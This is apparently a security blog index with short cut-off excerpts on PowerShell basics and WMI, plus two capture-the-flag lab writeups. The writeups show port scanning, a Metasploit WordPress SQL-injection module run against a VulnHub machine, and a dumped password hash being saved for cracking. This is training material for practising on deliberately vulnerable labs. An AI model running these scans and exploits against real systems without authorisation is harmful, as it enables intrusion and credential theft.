Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects so place be careful while removing on object: PS C:\Windows\system32> Get-WmiObject -Class win32_process | where-object {$_.Name -eq “notepad.exe”} | Remove-WmiObject PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter “Name = ‘notepad.exe’” | remove-ciminstance PS C:\Windows\system32> Get-WmiObject -class win32_process -filter ‘Name = “calculator.exe”‘ PS C:\Windows\system32> Get-WmiObject -class win32_process –list Exploring Methods: Find all…

HACKTHEBOX * Vulnerable Machine Writeup

SAFE (HACKTHEBOX)

root@kali:~/Downloads# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.147 –rate=1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-10-28 04:48:17 GMT— forced options: -sS -Pn -n –randomize-hosts -v –send-ethInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 1337/tcp on 10.10.10.147 Discovered open port 22/tcp on 10.10.10.147 Discovered open port 80/tcp on 10.10.10.147 ^Zte: 0.00-kpps, 100.00% done, waiting -13-secs, found=3 [2]+…

Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova root@kali:~# nmap -A 192.168.0.20 port : 21 , 22 , 80 , 10000 Enumeration : http://192.168.0.20 now on terminal root@kali:~# wpscan –url http://192.168.0.20/ WordPress Google maps Sqli Exploit : msf5 > use auxiliary/admin/http/wp google_maps_sqlimsf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit we get the output webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl root@kali:~# gedit hash webmaster…

Powershell * RED TEAM SECURITY

Powershell Begineer

Powershell Help system : List everything which contains the word process : PS C:\Users\victim6\Downloads\new\new> get-help *process* PS C:\Users\victim6\Downloads\new\new> get-help about_* PS C:\Users\victim6\Downloads\new\new> $psversiontable PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name PS C:\Users\victim6\Downloads\new\new> get-help * Update the help system (v3+) PS C:\Users\victim6\Downloads\new\new> update-help List full help about a topic PS C:\Users\victim6\Downloads\new\new> get-help get-item Lists examples of how…